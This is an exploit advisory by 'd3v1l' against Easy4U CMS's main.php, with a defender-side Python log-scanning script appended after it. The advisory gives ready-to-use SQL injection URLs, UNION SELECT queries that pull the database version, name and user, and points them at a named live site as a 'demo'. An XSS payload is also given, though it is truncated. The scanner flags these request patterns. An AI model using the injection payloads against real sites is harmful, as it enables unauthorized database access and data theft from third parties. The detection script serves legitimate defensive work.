[~]-----------------------------------------------------------------------
[~] Easy4U CMS [main.php] - Multiple Remote Vulnerabilities
[~]
[~] http://www.ekkelenkamp.nl/Content_Management-pages-id-17.htm
[~]-----------------------------------------------------------------------
[~] Bug found by d3v1l
[~]
[~] Date: 29.09.2008
[~]
[~] d3v1l@spoofer.com
[~]
[~]-----------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig AND milw0rm staff
[~]-----------------------------------------------------------------------
[~] Exploit :- SQL Injection
[~]
[~] http://site.com/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
[~] http://site.com/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~] [on some sites this works only with LIMIT 1,1]
[~]
[~] Demo :-
[~]
[~] http://charcot-ms.eu/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~]-----------------------------------------------------------------------
[~]
[~] Exploit :- XSS (cross site scripting)
[~]
[~] http://site.com/main.php?pag=search ">
[~]
[~] Demo :-
[~]
[~] http://charcot-ms.eu/main.php?pag=search -> try putting something like this in the search box -> ">
[~]-----------------------------------------------------------------------
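A defender-side check for the two request patterns listed above, as an added example that is not part of the original advisory: it flags requests to main.php where `id` is not purely numeric on `pag=pages`, or where any parameter on `pag=search` carries quote or angle-bracket characters. The log lines, the combined-log layout and the parameter name `q` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Sep/2008:10:00:01 +0000] "GET /main.php?pag=pages&id=17 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [29/Sep/2008:10:00:05 +0000] "GET /main.php?pag=pages&id=1%27%20UNION%20SELECT%201,2,3/* HTTP/1.1" 200 812',
    '198.51.100.9 - - [29/Sep/2008:10:00:09 +0000] "GET /main.php?pag=search&q=%22%3E%3Cb%3E HTTP/1.1" 200 900',
    '198.51.100.7 - - [29/Sep/2008:10:00:12 +0000] "GET /main.php?pag=search&q=opening+hours HTTP/1.1" 200 2300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'["<>]')  # characters that break out of an HTML attribute

def classify(line):
    """Return a list of findings for one log line (empty list means clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/main.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    pag = params.get("pag", [""])[0]
    findings = []
    if pag == "pages":
        for value in params.get("id", []):
            # A page id should be an integer; anything else is suspect.
            if not re.fullmatch(r"[0-9]+", value):
                findings.append("sqli: non-numeric id")
    elif pag == "search":
        for name, values in params.items():
            if any(MARKUP_RE.search(v) for v in values):
                findings.append(f"xss: markup characters in {name}")
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for every flagged request."""
    return [(i, f) for i, line in enumerate(lines, 1) for f in classify(line)]

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE_LOG):
        print(lineno, finding)
```

Search terms submitted by POST do not appear in access logs, so the search check only covers GET requests. The same integer-only rule for `id` is the input validation the application itself should enforce before building the query.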